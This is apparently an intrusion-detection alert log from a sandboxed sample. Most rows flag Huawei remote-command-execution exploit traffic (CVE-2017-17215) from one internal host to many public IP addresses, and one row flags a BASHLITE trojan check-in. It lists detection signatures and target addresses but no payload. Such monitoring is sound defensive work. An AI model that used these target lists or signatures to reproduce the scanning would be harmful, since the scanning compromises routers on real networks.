                                            06/14/24-10:44:31.091652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6006037215192.168.2.1441.167.138.43
                                            06/14/24-10:44:35.179844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5324837215192.168.2.14197.57.195.73
                                            06/14/24-10:44:26.978044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4736237215192.168.2.14197.85.112.15
                                            06/14/24-10:44:29.023956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3817837215192.168.2.14197.96.43.97
                                            06/14/24-10:44:10.547651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3436037215192.168.2.14156.223.91.27
                                            06/14/24-10:43:50.074908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3565837215192.168.2.1441.49.233.83
                                            06/14/24-10:43:50.073403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4155237215192.168.2.14197.166.39.177
                                            06/14/24-10:44:16.732216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4716237215192.168.2.14156.233.188.116
                                            06/14/24-10:44:14.687856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3478437215192.168.2.1441.19.144.247
                                            06/14/24-10:44:06.453815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4184037215192.168.2.1441.174.39.105
                                            06/14/24-10:43:48.022183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4719637215192.168.2.1441.41.63.182
                                            06/14/24-10:44:16.736311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4737037215192.168.2.14156.87.208.86
                                            06/14/24-10:43:48.016541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5145437215192.168.2.14197.31.162.68
                                            06/14/24-10:44:35.177325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3722837215192.168.2.14197.75.14.248
                                            06/14/24-10:44:24.944650TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4521237215192.168.2.14156.2.210.171
                                            06/14/24-10:43:41.846308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6016437215192.168.2.1441.208.18.167
                                            06/14/24-10:43:34.662725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4853237215192.168.2.1441.162.130.70
                                            06/14/24-10:43:34.660836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4479637215192.168.2.1441.85.57.174
                                            06/14/24-10:44:04.421967TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3388437215192.168.2.14156.76.66.31
                                            06/14/24-10:43:34.663769TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4240837215192.168.2.1441.201.118.253
                                            06/14/24-10:43:43.942969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5033237215192.168.2.14197.0.213.120
                                            06/14/24-10:44:12.641728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3369037215192.168.2.14156.85.116.40
                                            06/14/24-10:43:48.045578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5019037215192.168.2.1441.88.58.201
                                            06/14/24-10:44:26.978817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5434637215192.168.2.14156.108.186.12
                                            06/14/24-10:44:18.776090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3689637215192.168.2.1441.155.142.76
                                            06/14/24-10:43:50.072725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4372637215192.168.2.14197.55.174.44
                                            06/14/24-10:44:00.326276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4712437215192.168.2.1441.188.151.82
                                            06/14/24-10:44:02.367238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5730437215192.168.2.14156.96.46.251
                                            06/14/24-10:44:14.668883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3410637215192.168.2.14156.108.162.83
                                            06/14/24-10:44:14.669795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5430837215192.168.2.1441.209.38.196
                                            06/14/24-10:44:31.055639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3808837215192.168.2.1441.81.127.67
                                            06/14/24-10:44:31.055042TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5915637215192.168.2.14197.225.143.22
                                            06/14/24-10:43:37.759038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4442237215192.168.2.14197.231.184.84
                                            06/14/24-10:43:48.019924TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6024437215192.168.2.1441.96.236.7
                                            06/14/24-10:44:08.520637TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5489037215192.168.2.14197.37.83.203
                                            06/14/24-10:43:45.967230TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4951437215192.168.2.14197.10.182.24
                                            06/14/24-10:43:56.243369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4499637215192.168.2.1441.42.20.126
                                            06/14/24-10:43:43.971743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4625637215192.168.2.1441.105.216.230
                                            06/14/24-10:43:54.185490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4958837215192.168.2.14156.162.225.223
                                            06/14/24-10:44:14.689000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3886437215192.168.2.14197.24.74.55
                                            06/14/24-10:43:48.034471TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6030237215192.168.2.14197.139.193.249
                                            06/14/24-10:44:00.339923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3984837215192.168.2.1441.53.193.205
                                            06/14/24-10:44:33.132693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4750837215192.168.2.14197.181.139.121
                                            06/14/24-10:43:58.277655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4212837215192.168.2.14197.126.241.87
                                            06/14/24-10:43:45.985364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5780037215192.168.2.14156.225.54.5
                                            06/14/24-10:43:50.073269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4803037215192.168.2.14156.153.15.116
                                            06/14/24-10:44:10.565084TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5289637215192.168.2.1441.71.156.224
                                            06/14/24-10:44:06.471210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4812837215192.168.2.14156.218.246.18
                                            06/14/24-10:44:29.025269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5989237215192.168.2.14156.172.121.255
                                            06/14/24-10:44:04.410658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4642637215192.168.2.14197.21.124.49
                                            06/14/24-10:43:34.678796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3428237215192.168.2.14197.107.104.42
                                            06/14/24-10:43:43.940243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4017037215192.168.2.14197.130.251.172
                                            06/14/24-10:43:36.703434TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4358037215192.168.2.14156.83.22.114
                                            06/14/24-10:44:24.943525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4664437215192.168.2.1441.237.89.157
                                            06/14/24-10:44:02.368389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4666237215192.168.2.1441.150.186.50
                                            06/14/24-10:44:29.023910TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5471237215192.168.2.14197.31.97.183
                                            06/14/24-10:43:45.969151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5644037215192.168.2.14156.192.255.142
                                            06/14/24-10:43:43.941887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5547237215192.168.2.14197.201.142.176
                                            06/14/24-10:43:41.896584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4030437215192.168.2.14197.135.208.50
                                            06/14/24-10:44:26.997466TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4584037215192.168.2.1441.173.107.225
                                            06/14/24-10:43:54.186155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6042237215192.168.2.14156.79.103.131
                                            06/14/24-10:43:54.201873TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3977437215192.168.2.1441.20.182.251
                                            06/14/24-10:44:08.520371TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3906637215192.168.2.1441.41.86.176
                                            06/14/24-10:44:18.765882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5899037215192.168.2.14156.143.214.191
                                            06/14/24-10:43:45.968096TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4423837215192.168.2.1441.46.194.184
                                            06/14/24-10:43:52.164500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4290837215192.168.2.14156.104.187.50
                                            06/14/24-10:44:06.448120TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4278837215192.168.2.1441.248.73.205
                                            06/14/24-10:44:22.635610TCP2840515ETPRO TROJAN ELF/BASHLITE Variant Reporting Arch Type (i586)4047023192.168.2.14101.23.0.0
                                            06/14/24-10:44:24.916265TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4110637215192.168.2.1441.56.161.183
                                            06/14/24-10:44:33.132907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5255437215192.168.2.14197.211.111.19
                                            06/14/24-10:44:26.980375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5084237215192.168.2.1441.155.243.173
                                            06/14/24-10:43:45.989512TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3832837215192.168.2.1441.184.209.78
                                            06/14/24-10:44:00.325945TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3713637215192.168.2.1441.57.15.216
                                            06/14/24-10:43:48.030255TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5701637215192.168.2.1441.17.65.99
                                            06/14/24-10:44:33.134949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5129437215192.168.2.1441.86.94.77
                                            06/14/24-10:44:06.453723TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5379637215192.168.2.14197.22.153.169
                                            06/14/24-10:44:26.979375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5511437215192.168.2.1441.203.192.164
                                            06/14/24-10:44:26.977014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3454237215192.168.2.14197.170.69.219
                                            06/14/24-10:43:50.070971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5799237215192.168.2.1441.11.154.26
                                            06/14/24-10:43:50.115858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3615637215192.168.2.14197.6.236.92
                                            06/14/24-10:44:02.364668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3359637215192.168.2.14156.169.148.135
                                            06/14/24-10:43:45.968427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5414437215192.168.2.14156.79.39.69
                                            06/14/24-10:44:26.977066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4246237215192.168.2.14197.150.77.0
                                            06/14/24-10:44:02.369013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3564437215192.168.2.14156.45.109.231
                                            06/14/24-10:44:29.011987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3652637215192.168.2.14156.99.205.209
                                            06/14/24-10:43:37.763576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4289237215192.168.2.14156.98.19.152
                                            06/14/24-10:44:12.646808TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5974437215192.168.2.1441.220.46.203
                                            06/14/24-10:44:26.986427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4189837215192.168.2.14197.70.235.213
                                            06/14/24-10:44:02.383911TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3324037215192.168.2.14197.100.224.122
                                            06/14/24-10:44:29.012569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5941437215192.168.2.1441.189.14.229
                                            06/14/24-10:44:00.344538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4822837215192.168.2.14197.18.178.21
                                            06/14/24-10:44:14.682432TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5056837215192.168.2.14156.94.130.85
                                            06/14/24-10:44:35.180573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5625637215192.168.2.14197.152.204.124
                                            06/14/24-10:44:20.806718TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4513837215192.168.2.1441.237.21.62
                                            06/14/24-10:44:16.718444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4902037215192.168.2.14156.62.24.87
                                            06/14/24-10:44:00.342703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5357437215192.168.2.14197.197.220.151
                                            06/14/24-10:43:56.229661TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4535637215192.168.2.14156.5.187.229
                                            06/14/24-10:44:00.321001TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5831237215192.168.2.14156.4.67.164
                                            06/14/24-10:43:36.726886TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5157237215192.168.2.1441.160.46.91
                                            06/14/24-10:43:48.017476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4439237215192.168.2.14156.100.36.153
                                            06/14/24-10:44:16.734961TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3776037215192.168.2.14156.94.50.129
                                            06/14/24-10:44:22.879779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5510437215192.168.2.14156.60.118.166
                                            06/14/24-10:43:36.703102TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3399837215192.168.2.1441.108.241.16
                                            06/14/24-10:44:06.451159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3468837215192.168.2.14197.216.171.94
                                            06/14/24-10:44:06.472725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4941437215192.168.2.14197.217.162.70
                                            06/14/24-10:43:36.726303TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5585837215192.168.2.14197.74.254.110
                                            06/14/24-10:44:00.326490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5566037215192.168.2.14197.58.81.34
                                            06/14/24-10:44:02.366028TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5109037215192.168.2.1441.233.223.164
                                            06/14/24-10:44:06.471269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3890237215192.168.2.14197.169.51.90
                                            06/14/24-10:44:33.133736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3419037215192.168.2.14156.115.79.165
                                            06/14/24-10:44:06.452010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4440237215192.168.2.14156.227.240.170
                                            06/14/24-10:44:00.336824TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6014037215192.168.2.14156.107.248.249
                                            06/14/24-10:44:24.917802TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4683837215192.168.2.14156.75.76.33
                                            06/14/24-10:44:06.452103TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4348437215192.168.2.14156.139.48.94
                                            06/14/24-10:44:06.473551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3997837215192.168.2.14197.51.98.246
                                            06/14/24-10:44:33.132379TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5139237215192.168.2.14197.28.50.253
                                            06/14/24-10:44:27.001829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5546837215192.168.2.14156.169.164.146
                                            06/14/24-10:44:33.149876TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5714037215192.168.2.1441.253.221.111
                                            06/14/24-10:44:04.421314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4489637215192.168.2.1441.50.204.169
                                            06/14/24-10:44:22.859414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5412037215192.168.2.14197.55.5.0
                                            06/14/24-10:44:20.805097TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4805437215192.168.2.14156.190.133.88
                                            06/14/24-10:44:20.804433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5893637215192.168.2.1441.228.29.128
                                            06/14/24-10:43:43.971311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5116837215192.168.2.14197.82.112.167
                                            06/14/24-10:43:48.033115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5563237215192.168.2.14156.26.181.114
                                            06/14/24-10:44:16.734696TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4242237215192.168.2.1441.127.113.202
                                            06/14/24-10:44:14.666788TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4968437215192.168.2.1441.95.246.187
                                            06/14/24-10:43:34.661477TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5092037215192.168.2.1441.156.92.120
                                            06/14/24-10:44:24.943085TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4912837215192.168.2.14156.206.34.243
                                            06/14/24-10:43:34.678945TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3599837215192.168.2.14197.61.126.76
                                            06/14/24-10:43:36.728780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5885837215192.168.2.14197.176.80.91
                                            06/14/24-10:43:43.941317TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5698437215192.168.2.1441.139.5.67
                                            06/14/24-10:43:43.972546TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5708437215192.168.2.14156.33.138.240
                                            06/14/24-10:44:26.979020TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6065437215192.168.2.14197.201.185.153
                                            06/14/24-10:43:37.759298TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5736237215192.168.2.14197.142.21.60
                                            06/14/24-10:44:29.024414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4052837215192.168.2.14197.219.237.120
                                            06/14/24-10:44:18.763918TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4291037215192.168.2.1441.199.146.40
                                            06/14/24-10:44:08.502966TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5939837215192.168.2.14197.64.123.13
                                            06/14/24-10:43:50.115213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3901437215192.168.2.14197.97.108.145
                                            06/14/24-10:44:26.980439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5256437215192.168.2.14197.165.155.159
                                            06/14/24-10:43:36.725096TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3404037215192.168.2.14156.46.188.127
                                            06/14/24-10:43:54.203123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5585237215192.168.2.1441.8.236.239
                                            06/14/24-10:44:22.878243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5705037215192.168.2.14197.212.248.63
                                            06/14/24-10:44:04.407321TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5425237215192.168.2.14156.249.49.66
                                            06/14/24-10:44:35.177940TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5281437215192.168.2.14197.132.192.124
                                            06/14/24-10:43:56.226270TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5814837215192.168.2.14197.251.109.148
                                            06/14/24-10:43:48.029377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5284837215192.168.2.1441.238.201.145
                                            06/14/24-10:44:26.979950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5605637215192.168.2.14197.8.122.255
                                            06/14/24-10:44:33.149610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4990437215192.168.2.14197.33.132.84
                                            06/14/24-10:44:20.806247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5896637215192.168.2.1441.74.149.75
                                            06/14/24-10:43:34.660617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4271437215192.168.2.1441.187.63.243
                                            06/14/24-10:44:02.381511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3715837215192.168.2.14197.201.47.205
                                            06/14/24-10:44:22.858343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6025037215192.168.2.14197.135.99.221
                                            06/14/24-10:44:33.148426TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5296237215192.168.2.14156.162.99.201
                                            06/14/24-10:43:58.273410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4887037215192.168.2.14156.7.224.98
                                            06/14/24-10:44:29.013264TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5169837215192.168.2.1441.168.43.183
                                            06/14/24-10:43:34.660562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5145637215192.168.2.1441.78.102.254
                                            06/14/24-10:43:58.274757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5360637215192.168.2.14156.134.254.69
                                            06/14/24-10:44:33.132062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5758237215192.168.2.14197.120.63.17
                                            06/14/24-10:44:26.999650TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4574837215192.168.2.14156.75.240.172
                                            06/14/24-10:44:14.670880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5669037215192.168.2.1441.111.29.174
                                            06/14/24-10:43:50.115090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3675037215192.168.2.14156.164.26.1
                                            06/14/24-10:44:20.829455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5326437215192.168.2.1441.235.196.224
                                            06/14/24-10:43:48.033456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5054037215192.168.2.14156.197.43.129
                                            06/14/24-10:43:39.808748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5653237215192.168.2.14197.131.140.249
                                            06/14/24-10:44:31.057382TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4777837215192.168.2.14156.193.174.24
                                            06/14/24-10:43:58.277134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3636637215192.168.2.14156.109.246.252
                                            06/14/24-10:44:12.645839TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4683437215192.168.2.14156.139.157.120
                                            06/14/24-10:43:41.847641TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3623237215192.168.2.1441.2.252.238
                                            06/14/24-10:44:27.000222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5349837215192.168.2.14197.244.118.113
                                            06/14/24-10:43:58.276827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4779637215192.168.2.14156.85.220.235
                                            06/14/24-10:43:43.942875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6003437215192.168.2.14156.175.131.32
                                            06/14/24-10:43:41.847881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3607237215192.168.2.14197.245.52.8
                                            06/14/24-10:43:50.071753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4400237215192.168.2.14156.114.240.61
                                            06/14/24-10:43:39.790310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5372837215192.168.2.14197.178.226.117
                                            06/14/24-10:44:33.150066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5969237215192.168.2.14197.230.42.43
                                            06/14/24-10:43:37.763393TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5833637215192.168.2.14156.238.39.7
                                            06/14/24-10:44:24.914236TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4305237215192.168.2.14197.218.81.90
                                            06/14/24-10:44:10.581170TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4087637215192.168.2.1441.236.1.12
                                            06/14/24-10:44:12.646637TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4853837215192.168.2.14156.34.195.188
                                            06/14/24-10:44:20.804913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5197437215192.168.2.1441.150.34.225
                                            06/14/24-10:43:56.228452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6004037215192.168.2.1441.211.229.178
                                            06/14/24-10:43:58.277528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5198637215192.168.2.14156.12.170.36
                                            06/14/24-10:43:41.848203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4253637215192.168.2.1441.216.89.149
                                            06/14/24-10:43:54.185078TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4166437215192.168.2.1441.27.146.24
                                            06/14/24-10:43:58.277363TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5259637215192.168.2.14197.16.131.76
                                            06/14/24-10:44:14.689316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4731637215192.168.2.14156.5.87.106
                                            06/14/24-10:44:22.860127TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5579637215192.168.2.14197.4.209.32
                                            06/14/24-10:43:50.112159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4248037215192.168.2.14156.207.89.240
